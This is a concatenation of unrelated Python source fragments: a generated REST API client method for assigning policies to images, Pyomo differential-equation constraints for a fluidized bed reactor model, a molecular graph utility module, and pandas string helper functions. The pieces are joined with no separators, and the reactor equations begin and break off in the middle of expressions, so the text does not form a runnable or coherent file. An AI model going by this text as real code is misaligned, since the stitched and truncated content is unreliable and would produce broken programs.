returns the request thread.
"""
all_params = ['image_id', 'policy_id']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method assign_policy_to_image" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'image_id' is set
if ('image_id' not in params) or (params['image_id'] is None):
raise ValueError("Missing the required parameter `image_id` when calling `assign_policy_to_image`")
# verify the required parameter 'policy_id' is set
if ('policy_id' not in params) or (params['policy_id'] is None):
raise ValueError("Missing the required parameter `policy_id` when calling `assign_policy_to_image`")
collection_formats = {}
path_params = {}
if 'image_id' in params:
path_params['imageID'] = params['image_id']
if 'policy_id' in params:
path_params['policyID'] = params['policy_id']
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = ['ApiKey']
return self.api_client.call_api('/Images/{imageID}/Policies/{policyID}', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Image',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
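# Illustrative usage sketch (not part of the generated client; the IDs below are placeholders):
#
#   api = ImageApi()
#   api.assign_policy_to_image("<imageID hex>", "<policyID hex>")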
def delete_image(self, image_id, **kwargs):
"""
Delete specified image
Deletes the specified image.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.delete_image(image_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str image_id: hexadecimal ID of image to delete (required)
:return: None
If the method is called asynchronously,
returns the request thread.
jx] * m.delta[it, jt, ix, jx] * (1 - m.ed[it, jt, ix, jx]) * \
sum(m.rgc[it, jt, ix, jx, k] * m.cpgcgc[k] for k in m.sp) * m.Tgc[it, jt, ix, jx]) * m.hi_t[it]
else:
return Constraint.Skip
# equation A.5 Solid phase adsorbed species balance
# dNsc_dt
def de_nsc_rule(m, it, jt, ix, jx, k):
if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
return m.dNsc_dt[it, jt, ix, jx, k] * m.hi_x[ix] == \
(-m.dccwin_dx[it, jt, ix, jx, k] * m.Ax - m.Ksbulk[it, jt, ix, jx, k] - \
m.hi_x[ix] * m.Ax * m.delta[it, jt, ix, jx] * m.rhos * m.Kcebs[it, jt, ix, jx] * (
m.nc[it, jt, ix, jx, k] - m.ne[it, jt, ix, jx, k]) + \
m.hi_x[ix] * m.Ax * m.fcw[it, jt, ix, jx] * m.delta[it, jt, ix, jx] * (1 - m.ed[it, jt, ix, jx]) *
m.rsc[it, jt, ix, jx, k]) * m.hi_t[it]
else:
return Constraint.Skip
# put derivative space here
# equation A.6 Solid phase energy balance
# dHsc_dt
def de_hsc_rule(m, it, jt, ix, jx):
if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
return m.dHsc_dt[it, jt, ix, jx] * m.hi_x[ix] \
== (-m.decwin_dx[it, jt, ix, jx] * m.Ax - m.Hsbulk[it, jt, ix, jx] - \
m.hi_x[ix] * m.Ax * m.delta[it, jt, ix, jx] * m.rhos * m.Kcebs[it, jt, ix, jx] * (m.hsc[it, jt, ix, jx] - m.hse[it, jt, ix, jx]) + \
m.hi_x[ix] * m.Ax * m.fcw[it, jt, ix, jx] * m.delta[it, jt, ix, jx] * (
1 - m.ed[it, jt, ix, jx]) * sum((m.rgc[it, jt, ix, jx, k] * m.cpgcgc[k]) for k in m.sp) * (m.Tgc[it, jt, ix, jx]) + \
m.hi_x[ix] * m.Ax * m.fcw[it, jt, ix, jx] * m.delta[it, jt, ix, jx] * (
1 - m.ed[it, jt, ix, jx]) * m.rhos * m.ap * m.hp[it, jt, ix, jx] * (
m.Tgc[it, jt, ix, jx] - m.Tsc[it, jt, ix, jx])) * m.hi_t[it]
else:
return Constraint.Skip
# equation A.7 Gas phase component balance
# dNge_dt
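# emulsion-phase gas component balance: accumulation equals the cloud/wake-to-emulsion transfer
# Ax*delta*Kce*(cc - ce), minus gas adsorbed by the emulsion solids, minus the bulk gas exchange
# Kgbulk/hi_x, all scaled by the time-element length hi_t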
def de_nge_rule(m, it, jt, ix, jx, k):
if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
return m.dNge_dt[it, jt, ix, jx, k] \
== (m.Ax * m.delta[it, jt, ix, jx] * m.Kce[it, jt, ix, jx, k] * (
m.cc[it, jt, ix, jx, k] - m.ce[it, jt, ix, jx, k]) - \
m.Ax * (1. - m.fcw[it, jt, ix, jx] * m.delta[it, jt, ix, jx] - m.delta[it, jt, ix, jx]) * (
1. - m.ed[it, jt, ix, jx]) * m.rge[
it, jt, ix, jx, k] - \
m.Kgbulk[it, jt, ix, jx, k] / m.hi_x[ix]) * m.hi_t[it]
else:
return Constraint.Skip
# equation A.8 Gas phase energy balance
# dHge_dt
def de_hge_rule(m, it, jt, ix, jx):
if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
return m.dHge_dt[it, jt, ix, jx] \
== (m.Ax * m.delta[it, jt, ix, jx] * m.Hce[it, jt, ix, jx] * (
m.Tgc[it, jt, ix, jx] - m.Tge[it, jt, ix, jx]) - \
m.Ax * (1 - m.fcw[it, jt, ix, jx] * m.delta[it, jt, ix, jx] - m.delta[it, jt, ix, jx]) * (
1. - m.ed[it, jt, ix, jx]) * m.rhos * m.ap * m.hp[it, jt, ix, jx] * (
m.Tge[it, jt, ix, jx] - m.Tse[it, jt, ix, jx]) - \
m.Hgbulk[it, jt, ix, jx] / m.hi_x[ix] - \
m.Ax * (1. - m.fcw[it, jt, ix, jx] * m.delta[it, jt, ix, jx] - m.delta[it, jt, ix, jx]) * (
1. - m.ed[it, jt, ix, jx]) * \
sum(m.rge[it, jt, ix, jx, k] * m.cpgcge[k] for k in m.sp) * m.Tge[it, jt, ix, jx]) * m.hi_t[it]
else:
return Constraint.Skip
# put derivative space here
# equation A.9 Solid phase adsorbed species balance
# dNse_dt
def de_nse_rule(m, it, jt, ix, jx, k):
if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
return m.dNse_dt[it, jt, ix, jx, k] * m.hi_x[ix] == \
(m.dcein_dx[it, jt, ix, jx, k] * m.Ax + m.Ksbulk[it, jt, ix, jx, k] + \
m.hi_x[ix] * m.Ax * m.delta[it, jt, ix, jx] * m.rhos * m.Kcebs[it, jt, ix, jx] * (
m.nc[it, jt, ix, jx, k] - m.ne[it, jt, ix, jx, k]) + \
m.hi_x[ix] * m.Ax * (
1 - m.fcw[it, jt, ix, jx] * m.delta[it, jt, ix, jx] - m.delta[it, jt, ix, jx]) * (
1 - m.ed[it, jt, ix, jx]) * m.rse[it, jt, ix, jx, k]) * m.hi_t[it]
else:
return Constraint.Skip
# put derivative space here
# equation A.10 Solid phase energy balance
# dHse_dt
def de_hse_rule(m, it, jt, ix, jx):
if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
return m.dHse_dt[it, jt, ix, jx] * m.hi_x[ix] == \
(m.deein_dx[it, jt, ix, jx] * m.Ax + m.Hsbulk[it, jt, ix, jx] + \
m.hi_x[ix] * m.Ax * m.delta[it, jt, ix, jx] * m.rhos * m.Kcebs[it, jt, ix, jx] * (
m.hsc[it, jt, ix, jx] - m.hse[it, jt, ix, jx]) + \
m.hi_x[ix] * m.Ax * (
1 - m.fcw[it, jt, ix, jx] * m.delta[it, jt, ix, jx] - m.delta[it, jt, ix, jx]) * (
1 - m.ed[it, jt, ix, jx]) * \
sum((m.rge[it, jt, ix, jx, k] * m.cpgcge[k]) for k in m.sp) * m.Tge[it, jt, ix, jx] + \
m.hi_x[ix] * m.Ax * (
1. - m.fcw[it, jt, ix, jx] * m.delta[it, jt, ix, jx] - m.delta[it, jt, ix, jx]) * (
1. - m.ed[it, jt, ix, jx]) * m.rhos * m.ap * m.hp[it, jt, ix, jx] * (
m.Tge[it, jt, ix, jx] - m.Tse[it, jt, ix, jx]) + \
m.hi_x[ix] * m.pi * m.dx * m.ht[it, jt, ix, jx] * m.dThx[it, jt, ix, jx] * m.Nx * m.Cr) * m.hi_t[it]
else:
return Constraint.Skip
# shift the AV?
# dz_dx
def dex_z_rule(m, it, jt, ix, jx):
if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
return m.dz_dx[it, jt, ix, jx] == 0
else:
return Constraint.Skip
# Kgbulk
def i1_rule(m, it, jt, ix, jx, k):
if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
return m.Kgbulk[it, jt, ix, jx, k] == m.K_d * (sum(m.ce[it, jt, ix, jx, kx] for kx in m.sp) - sum(m.cb[it, jt, ix, jx, kx] for kx in m.sp)) * m.yb[it, jt, ix, jx, k]
else:
return Constraint.Skip
# Hgbulk
def i2_rule(m, it, jt, ix, jx):
if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
return m.Hgbulk[it, jt, ix, jx] == m.K_d * (sum(m.ce[it, jt, ix, jx, kx] for kx in m.sp) - sum(m.cb[it, jt, ix, jx, kx] for kx in m.sp)) * m.cpg_mol * \
m.Tgb[it, jt, ix, jx]
else:
return Constraint.Skip
# Kgbulk
# oddly derivative-looking term here and in the next one
# definitely derivatives e19 and e20 from the BFB steady-state paper
def i3_rule(m, it, kt, ix, kx, c):
if 0 < kt <= m.ncp_t and 0 < kx <= m.ncp_x:
return m.Ksbulk[it, kt, ix, kx, c] == \
-m.Ax * sum(m.lydot[jx, kx] * m.Jc[it, kt, ix, jx] for jx in m.cp_x if 0 < jx <= m.ncp_x) * m.ne[it, kt, ix, kx, c]
else:
return Constraint.Skip
# Hsbulk
# m.Jc[it, jt, ix, jx]-m.Jc[i-1]
def i4_rule(m, it, kt, ix, kx):
if 0 < kt <= m.ncp_t and 0 < kx <= m.ncp_x:
return m.Hsbulk[it, kt, ix, kx] == \
-m.Ax * sum(m.lydot[jx, kx] * m.Jc[it, kt, ix, jx] for jx in m.cp_x if 0 < jx <= m.ncp_x) * m.hse[
it, kt, ix, kx]
# elif j == m.ncp_x:
# return m.Hsbulk[it, jt, ix, jx] == -m.Ax * (m.Jc[it, jt, ix, jx] - m.Jc[i, j - 1]) * m.hse[it, jt, ix, jx]
else:
return Constraint.Skip
# db
def i5_rule(m, it, jt, ix, jx):
if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
return m.db[it, jt, ix, jx] == m.dbu[it, jt, ix, jx]
else:
return Constraint.Skip
# vb
def i6_rule(m, it, jt, ix, jx):
if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
return m.vb[it, jt, ix, jx] == \
1.55 * ((m.vg[it, jt, ix, jx] - m.vmf[it, jt]) + 14.1 * (m.db[it, jt, ix, jx] +
# repo: sjklipp/autochem_1219
""" molecular graph
"""
import itertools
import functools
import numpy
import future.moves.itertools as fmit
from qcelemental import periodictable as pt
from automol import dict_
from automol.graph import _networkx
import automol.dict_.multi as mdict
import automol.create.graph as _create
ATM_SYM_POS = 0
ATM_IMP_HYD_VLC_POS = 1
ATM_STE_PAR_POS = 2
BND_ORD_POS = 0
BND_STE_PAR_POS = 1
# getters
def atoms(xgr):
""" atoms, as a dictionary
"""
atm_dct, _ = xgr
return atm_dct
def bonds(xgr):
""" bonds, as a dictionary
"""
_, bnd_dct = xgr
return bnd_dct
def atom_keys(xgr):
""" atom keys
"""
return frozenset(atoms(xgr).keys())
def bond_keys(xgr):
""" bond keys
"""
return frozenset(bonds(xgr).keys())
def dummy_bond_keys(xgr):
""" dummy bond (order=0) keys
"""
return frozenset(dict_.keys_by_value(bond_orders(xgr), lambda x: x == 0))
def atom_symbols(xgr):
""" atom symbols, as a dictionary
"""
return mdict.by_key_by_position(atoms(xgr), atom_keys(xgr), ATM_SYM_POS)
def atom_implicit_hydrogen_valences(xgr):
""" atom implicit hydrogen valences, as a dictionary
"""
return mdict.by_key_by_position(atoms(xgr), atom_keys(xgr),
ATM_IMP_HYD_VLC_POS)
def atom_stereo_parities(sgr):
""" atom parities, as a dictionary
"""
return mdict.by_key_by_position(atoms(sgr), atom_keys(sgr),
ATM_STE_PAR_POS)
def bond_orders(rgr):
""" bond orders, as a dictionary
"""
return mdict.by_key_by_position(bonds(rgr), bond_keys(rgr), BND_ORD_POS)
def bond_stereo_parities(sgr):
""" bond parities, as a dictionary
"""
return mdict.by_key_by_position(bonds(sgr), bond_keys(sgr),
BND_STE_PAR_POS)
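# A minimal, hypothetical usage sketch of the getters above.  It assumes a
# graph is the plain (atom_dct, bond_dct) pair unpacked by atoms()/bonds(),
# with atom values ordered (symbol, implicit-H count, stereo parity) and bond
# values ordered (order, stereo parity) per the *_POS constants, and that
# mdict.by_key_by_position returns {key: value[position]}.  The water molecule
# and its key numbering are illustrative only.
def _example_getters():
    atm_dct = {0: ('O', 0, None), 1: ('H', 0, None), 2: ('H', 0, None)}
    bnd_dct = {frozenset({0, 1}): (1, None), frozenset({0, 2}): (1, None)}
    xgr = (atm_dct, bnd_dct)
    return (atom_keys(xgr),     # frozenset({0, 1, 2})
            atom_symbols(xgr),  # expected: {0: 'O', 1: 'H', 2: 'H'}
            bond_orders(xgr))   # expected: {frozenset({0, 1}): 1, frozenset({0, 2}): 1}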
# setters
def relabel(xgr, atm_key_dct):
""" relabel the graph with new atom keys
"""
orig_atm_keys = atom_keys(xgr)
assert set(atm_key_dct.keys()) <= orig_atm_keys
new_atm_key_dct = dict(zip(orig_atm_keys, orig_atm_keys))
new_atm_key_dct.update(atm_key_dct)
_relabel_atom_key = new_atm_key_dct.__getitem__
def _relabel_bond_key(bnd_key):
return frozenset(map(_relabel_atom_key, bnd_key))
atm_dct = dict_.transform_keys(atoms(xgr), _relabel_atom_key)
bnd_dct = dict_.transform_keys(bonds(xgr), _relabel_bond_key)
return _create.from_atoms_and_bonds(atm_dct, bnd_dct)
def standard_keys(xgr):
""" replace the current atom keys with standard indices, counting from zero
"""
atm_key_dct = dict(enumerate(sorted(atom_keys(xgr))))
return relabel(xgr, atm_key_dct)
def transform_keys(xgr, atm_key_func):
""" transform atom keys with a function
"""
atm_keys = atom_keys(xgr)
atm_key_dct = dict(zip(atm_keys, map(atm_key_func, atm_keys)))
return relabel(xgr, atm_key_dct)
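# Hypothetical illustration of the relabelling helpers above (the +10 offset is
# made up): standard_keys renumbers atoms 0..n-1 in sorted-key order, and
# transform_keys then applies an arbitrary key function on top of that.
def _example_relabel(xgr):
    xgr = standard_keys(xgr)
    return transform_keys(xgr, lambda key: key + 10)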
def set_atom_implicit_hydrogen_valences(xgr, atm_imp_hyd_vlc_dct):
""" set atom implicit hydrogen valences
"""
atm_dct = mdict.set_by_key_by_position(atoms(xgr), atm_imp_hyd_vlc_dct,
ATM_IMP_HYD_VLC_POS)
bnd_dct = bonds(xgr)
return _create.from_atoms_and_bonds(atm_dct, bnd_dct)
def set_atom_stereo_parities(sgr, atm_par_dct):
""" set atom parities
"""
atm_dct = mdict.set_by_key_by_position(atoms(sgr), atm_par_dct,
ATM_STE_PAR_POS)
return _create.from_atoms_and_bonds(atm_dct, bonds(sgr))
def set_bond_orders(rgr, bnd_ord_dct):
""" set bond orders
"""
bnd_dct = mdict.set_by_key_by_position(bonds(rgr), bnd_ord_dct,
BND_ORD_POS)
return _create.from_atoms_and_bonds(atoms(rgr), bnd_dct)
def set_bond_stereo_parities(sgr, bnd_par_dct):
""" set bond parities
"""
bnd_dct = mdict.set_by_key_by_position(bonds(sgr), bnd_par_dct,
BND_STE_PAR_POS)
return _create.from_atoms_and_bonds(atoms(sgr), bnd_dct)
def add_atom_implicit_hydrogen_valences(xgr, inc_atm_imp_hyd_vlc_dct):
""" add atom implicit hydrogen valences
(increments can be positive or negative)
"""
atm_keys = list(inc_atm_imp_hyd_vlc_dct.keys())
atm_imp_hyd_vlcs = numpy.add(
dict_.values_by_key(atom_implicit_hydrogen_valences(xgr), atm_keys),
dict_.values_by_key(inc_atm_imp_hyd_vlc_dct, atm_keys))
assert all(atm_imp_hyd_vlc >= 0 for atm_imp_hyd_vlc in atm_imp_hyd_vlcs)
atm_imp_hyd_vlc_dct = dict_.transform_values(
dict(zip(atm_keys, atm_imp_hyd_vlcs)), int)
return set_atom_implicit_hydrogen_valences(xgr, atm_imp_hyd_vlc_dct)
def without_bond_orders(xgr):
""" resonance graph with maximum spin (i.e. no pi bonds)
"""
bnd_keys = bond_keys(xgr) - dummy_bond_keys(xgr)
bnd_ord_dct = dict_.by_key({}, bnd_keys, fill_val=1)
return set_bond_orders(xgr, bnd_ord_dct)
def without_stereo_parities(xgr):
""" graph with stereo assignments wiped out
"""
atm_ste_par_dct = dict_.by_key({}, atom_keys(xgr), fill_val=None)
bnd_ste_par_dct = dict_.by_key({}, bond_keys(xgr), fill_val=None)
xgr = set_atom_stereo_parities(xgr, atm_ste_par_dct)
xgr = set_bond_stereo_parities(xgr, bnd_ste_par_dct)
return xgr
def add_atoms(xgr, sym_dct, imp_hyd_vlc_dct=None, ste_par_dct=None):
""" add atoms to this molecular graph
"""
atm_keys = atom_keys(xgr)
atm_sym_dct = atom_symbols(xgr)
atm_imp_hyd_vlc_dct = atom_implicit_hydrogen_valences(xgr)
atm_ste_par_dct = atom_stereo_parities(xgr)
keys = set(sym_dct.keys())
imp_hyd_vlc_dct = {} if imp_hyd_vlc_dct is None else imp_hyd_vlc_dct
ste_par_dct = {} if ste_par_dct is None else ste_par_dct
assert not keys & atm_keys
assert set(imp_hyd_vlc_dct.keys()) <= keys
assert set(ste_par_dct.keys()) <= keys
atm_sym_dct.update(sym_dct)
atm_imp_hyd_vlc_dct.update(imp_hyd_vlc_dct)
atm_ste_par_dct.update(ste_par_dct)
atm_dct = _create.atoms_from_data(
atom_symbols=atm_sym_dct,
atom_implicit_hydrogen_valences=atm_imp_hyd_vlc_dct,
atom_stereo_parities=atm_ste_par_dct)
bnd_dct = bonds(xgr)
xgr = _create.from_atoms_and_bonds(atoms=atm_dct, bonds=bnd_dct)
return xgr
def add_bonds(xgr, keys, ord_dct=None, ste_par_dct=None):
""" add bonds to this molecular graph
"""
bnd_keys = set(bond_keys(xgr))
bnd_ord_dct = bond_orders(xgr)
bnd_ste_par_dct = bond_stereo_parities(xgr)
keys = set(map(frozenset, keys))
ord_dct = {} if ord_dct is None else ord_dct
ste_par_dct = {} if ste_par_dct is None else ste_par_dct
assert not keys & bnd_keys
assert set(ord_dct.keys()) <= keys
assert set(ste_par_dct.keys()) <= keys
bnd_keys.update(keys)
bnd_ord_dct.update(ord_dct)
bnd_ste_par_dct.update(ste_par_dct)
atm_dct = atoms(xgr)
bnd_dct = _create.bonds_from_data(
bond_keys=bnd_keys, bond_orders=bnd_ord_dct,
bond_stereo_parities=bnd_ste_par_dct)
xgr = _create.from_atoms_and_bonds(atoms=atm_dct, bonds=bnd_dct)
return xgr
def frozen(xgr):
""" hashable, sortable, immutable container of graph data
"""
atm_keys = sorted(atom_keys(xgr))
bnd_keys = sorted(bond_keys(xgr), key=sorted)
# make it sortable by replacing Nones with -infinity
atm_vals = numpy.array(dict_.values_by_key(atoms(xgr), atm_keys))
bnd_vals = numpy.array(dict_.values_by_key(bonds(xgr), bnd_keys))
atm_vals[numpy.equal(atm_vals, None)] = -numpy.inf
bnd_vals[numpy.equal(bnd_vals, None)] = -numpy.inf
frz_atms = tuple(zip(atm_keys, map(tuple, atm_vals)))
frz_bnds = tuple(zip(bnd_keys, map(tuple, bnd_vals)))
return (frz_atms, frz_bnds)
# graph theory library
# # atom properties
def atom_neighbor_keys(xgr):
""" keys of neighboring atoms, by atom
"""
def _neighbor_keys(atm_key, atm_nbh):
return frozenset(atom_keys(atm_nbh) - {atm_key})
atm_ngb_keys_dct = dict_.transform_items_to_values(
atom_neighborhoods(xgr), _neighbor_keys)
return atm_ngb_keys_dct
def atom_bond_keys(xgr):
""" bond keys, by atom
"""
return dict_.transform_values(atom_neighborhoods(xgr), bond_keys)
def atom_neighborhoods(xgr):
""" neighborhood subgraphs, by atom
"""
bnd_keys = bond_keys(xgr)
def _neighborhood(atm_key):
nbh_bnd_keys = set(filter(lambda x: atm_key in x, bnd_keys))
return bond_induced_subgraph(xgr, nbh_bnd_keys)
atm_keys = list(atom_keys(xgr))
atm_nbh_dct = dict(zip(atm_keys, map(_neighborhood, atm_keys)))
return atm_nbh_dct
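# For the water graph built in _example_getters above, atom_neighbor_keys would
# be expected to return {0: frozenset({1, 2}), 1: frozenset({0}), 2: frozenset({0})},
# assuming bond_induced_subgraph (defined elsewhere in this module) accepts the
# same plain-tuple graphs.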
# # bond properties
def bond_neighbor_keys(xgr):
""" keys of neighboring bonds, by bond
"""
def _neighbor_keys(bnd_key, bnd_nbh):
return frozenset(bond_keys(bnd_nbh) - {bnd_key})
bnd_ngb_keys_dct = dict_.transform_items_to_values(
bond_neighborhoods(xgr), _neighbor_keys)
return bnd_ngb_keys_dct
def bond_neighbor_bonds(bnd_key, xgr):
""" keys of the bonds that neighbor the given bond `bnd_key`
"""
atmi, atmj = list(bnd_key)
ngb_atm_dct = atom_neighbor_keys(xgr)
bonds = []
for atm in [atmi, atmj]:
alpha_atms = ngb_atm_dct[atm]
for alpha_atm in alpha_atms:
if alpha_atm not in [atmi, atmj]:
bonds.append(frozenset({atm, alpha_atm}))
return bonds
def bond_neighborhoods(xgr):
""" neighborhood subgraphs, by bond
"""
bnd_keys = list(bond_keys(xgr))
def _neighborhood(bnd_key):
nbh_bnd_keys = set(filter(lambda x: bnd_key & x, bnd_keys))
return bond_induced_subgraph(xgr, nbh_bnd_keys)
bnd_nbh_dct = dict(zip(bnd_keys, map(_neighborhood, bnd_keys)))
return bnd_nbh_dct
# # other properties
def branch(xgr, atm_key, bnd_key, saddle=False, ts_bnd=None):
""" branch extending along `bnd_key` away from `atm_key`
"""
return bond_induced_subgraph(xgr, branch_bond_keys(xgr, atm_key, bnd_key, saddle=saddle, ts_bnd=ts_bnd), saddle=saddle)
def branch_atom_keys(xgr, atm_key, bnd_key, saddle=False, ts_bnd=None):
""" atom keys for branch extending along `bnd_key` away from `atm_key`
"""
return atom_keys(branch(xgr, atm_key, bnd_key, saddle=saddle, ts_bnd=ts_bnd)) - {atm_key}
def branch_bond_keys(xgr, atm_key, bnd_key, saddle=False, ts_bnd=None):
""" bond keys for branch extending along `bnd_key` away from `atm_key`
"""
#bnd_key is the set of atom indices for the bond of interest
# atm_bnd_keys_dct is a dictionary of atoms that are connected to each atom
# atm_bnd_keys_dct = atom_bond_keys(xgr)
# print('atm_bnd_keys_dct:', atm_bnd_keys_dct)
# bnch_bnd_keys = {bnd_key}
# seen_bnd_keys = set()
# form set of keys of atoms connected to atm_key
# excl_bnd_keys = atm_bnd_keys_dct[atm_key]
# if bnd_key in excl_bnd_keys:
# excl_bnd_keys = excl_bnd_keys - {bnd_key}
# print('excl_bnd_keys:', excl_bnd_keys)
# new_bnd_keys = {bnd_key}
# bnd_ngb_keys_dct = bond_neighbor_keys(xgr)
# print('bnd_ngb_keys_dct:', bnd_ngb_keys_dct)
# if bnd_key not in bnd_ngb_keys_dct:
# for bnd in bnd_ngb_keys_dct:
# atmi, atmj = list(bnd)
# if atmi in list(ts_bnd) or atmj in list(ts_bnd):
# bnds = list(bnd_ngb_keys_dct[bnd])
# bnds.append(ts_bnd)
# bnd_ngb_keys_dct[bnd] = frozenset(bnds)
# bnd_ngb_keys_dct[bnd_key] = bond_neighbor_bonds(bnd_key, xgr)
# if saddle and bnd_key != ts_bnd:
# for bnd in bnd_ngb_keys_dct:
# atmi, atmj = list(bnd)
# if atmi in list(ts_bnd) or atmj in list(ts_bnd):
# bnds = list(bnd_ngb_keys_dct[bnd])
# bnds.append(ts_bnd)
# bnd_ngb_keys_dct[bnd] = frozenset(bnds)
# bnd_ngb_keys_dct[ts_bnd] = bond_neighbor_bonds(ts_bnd, xgr)
bnd_key = frozenset(bnd_key)
assert atm_key in bnd_key
if not saddle:
assert bnd_key in bond_keys(xgr)
#print('xgr test:', xgr)
#print('atm_key:', atm_key)
#print('bnd_key:', bnd_key)
#print('saddle:', saddle)
#print('ts_bnd:', ts_bnd)
atm_bnd_keys_dct = atom_bond_keys(xgr)
bnch_bnd_keys = {bnd_key}
seen_bnd_keys = set()
excl_bnd_keys = atm_bnd_keys_dct[atm_key] - {bnd_key}
new_bnd_keys = {bnd_key}
#print('new_bnd_keys:', new_bnd_keys)
bnd_ngb_keys_dct = bond_neighbor_keys(xgr)
#print('bnd_ngb_keys_dct:', bnd_ngb_keys_dct)
if ts_bnd:
bnd_ngb_keys_dct[ts_bnd] = bond_neighbor_bonds(ts_bnd, xgr)
#print('updated bnd_ngb_keys_dct:', bnd_ngb_keys_dct)
while new_bnd_keys:
new_bnd_ngb_keys = set(
itertools.chain(
*dict_.values_by_key(bnd_ngb_keys_dct, new_bnd_keys)))
bnch_bnd_keys.update(new_bnd_ngb_keys - excl_bnd_keys)
seen_bnd_keys.update(new_bnd_keys)
new_bnd_keys = bnch_bnd_keys - seen_bnd_keys
#print('branch bond keys:', bnch_bnd_keys)
return frozenset(bnch_bnd_keys)
def rings(xgr):
""" rings in the graph (minimal basis)
"""
xgrs = [bond_induced_subgraph(xgr, bnd_keys)
for bnd_keys in rings_bond_keys(xgr)]
return tuple(sorted(xgrs, key=frozen))
def rings_sorted_atom_keys(xgr):
""" atom keys for each ring in the graph sorted by connectivity (minimal basis)
"""
def _sorted_ring_atom_keys(rng_bnd_keys):
rng_bnd_keys = list(rng_bnd_keys)
bnd_key = min(rng_bnd_keys, key=sorted)
first_atm_key, atm_key = sorted(bnd_key)
rng_bnd_keys.remove(bnd_key)
rng_atm_keys = [first_atm_key, atm_key]
while rng_bnd_keys:
bnd_key = next(filter(lambda x: atm_key in x, rng_bnd_keys))
rng_bnd_keys.remove(bnd_key)
bnd_key = set(bnd_key)
bnd_key.remove(atm_key)
atm_key = next(iter(bnd_key))
rng_atm_keys.append(atm_key)
rng_atm_keys.pop(-1)
rng_atm_keys = tuple(rng_atm_keys)
return rng_atm_keys
rng_atm_keys_lst = frozenset(
map(_sorted_ring_atom_keys, rings_bond_keys(xgr)))
return rng_atm_keys_lst
def rings_bond_keys(xgr):
""" bond keys for each ring in the graph (minimal basis)
"""
bnd_keys = bond_keys(xgr)
def _ring_bond_keys(rng_atm_keys):
return frozenset(filter(lambda x: x <= rng_atm_keys, bnd_keys))
nxg = _networkx.from_graph(xgr)
rng_atm_keys_lst = _networkx.minimum_cycle_basis(nxg)
rng_bnd_keys_lst = frozenset(map(_ring_bond_keys, rng_atm_keys_lst))
return rng_bnd_keys_lst
def connected_components(xgr):
""" connected components in the graph
"""
cmp_xgr_atm_keys_lst = connected_components_atom_keys(xgr)
cmp_xgrs = tuple(subgraph(xgr, cmp_xgr_atm_keys)
for cmp_xgr_atm_keys in cmp_xgr_atm_keys_lst)
return cmp_xgrs
def connected_components_atom_keys(xgr):
""" atom keys for each connected component in the graph
"""
nxg = _networkx.from_graph(xgr)
cmp_xgr_atm_keys_lst = _networkx.connected_component_atom_keys(nxg)
return cmp_xgr_atm_keys_lst
def union(xgr1, xgr2):
""" a union of two graphs
"""
assert not atom_keys(xgr1) & atom_keys(xgr2)
atm_dct = {}
atm_dct.update(atoms(xgr1))
atm_dct.update(atoms(xgr2))
bnd_dct = {}
bnd_dct.update(bonds(xgr1))
bnd_dct.update(bonds(xgr2))
return _create.from_atoms_and_bonds(atm_dct, bnd_dct)
def subgraph(xgr, atm_keys):
""" the subgraph induced by a subset of the atoms
"""
atm_keys = set(atm_keys)
assert atm_keys <= atom_keys(xgr)
bnd_keys = set(filter(lambda x: x <= atm_keys, bond_keys(xgr)))
atm_dct = dict_.by_key(atoms(xgr), atm_keys)
bnd_dct = dict_.by_key(bonds(xgr), bnd_keys)
return _create.from_atoms_and_bonds(atm_dct, bnd_dct)
# repo: ToucanToco/toucan-data-sdk (1-10 GitHub stars)
from typing import Any, List
import numpy as np
import pandas as pd
__all__ = (
'lower',
'upper',
'title',
'capitalize',
'swapcase',
'length',
'isalnum',
'isalpha',
'isdigit',
'isspace',
'islower',
'isupper',
'istitle',
'isnumeric',
'isdecimal',
'strip',
'lstrip',
'rstrip',
'center',
'ljust',
'rjust',
'split',
'rsplit',
'partition',
'rpartition',
'find',
'rfind',
'index',
'rindex',
'startswith',
'endswith',
'concat',
'contains',
'repeat',
'replace_pattern',
# 'slice',
# 'slice_replace',
# 'count'
)
###################################################################################################
# METHODS WITH NO EXTRA PARAMETERS
#
# All these functions have the same signature:
# :param df: the dataframe
# :param column: the column
# :param new_column: the destination column (if not set, `column` will be used)
# :return: the transformed dataframe
###################################################################################################
def _generate_basic_str_postprocess(method_name, docstring):
def f(df, column: str, new_column: str = None):
method = getattr(df[column].str, method_name)
new_column = new_column or column
df.loc[:, new_column] = method()
return df
f.__name__ = method_name
f.__doc__ = f"""
{docstring}
See [pandas doc](
https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.Series.str.{method_name}.html) for more information
---
### Parameters
*mandatory :*
- `column` (*str*): the column
*optional :*
- `new_column` (*str*): the destination column (if not set, `column` will be used)
"""
return f
doc = 'Compute length of each string of `column`'
length = _generate_basic_str_postprocess('len', doc)
# lower, upper, capitalize, title, swapcase
###################################################################################################
doc = 'Converts all characters of `column` to lowercase.'
lower = _generate_basic_str_postprocess('lower', doc)
doc = 'Converts all characters of `column` to uppercase.'
upper = _generate_basic_str_postprocess('upper', doc)
doc = (
'Converts first character to uppercase and remaining ' 'to lowercase for each line of `column`.'
)
capitalize = _generate_basic_str_postprocess('capitalize', doc)
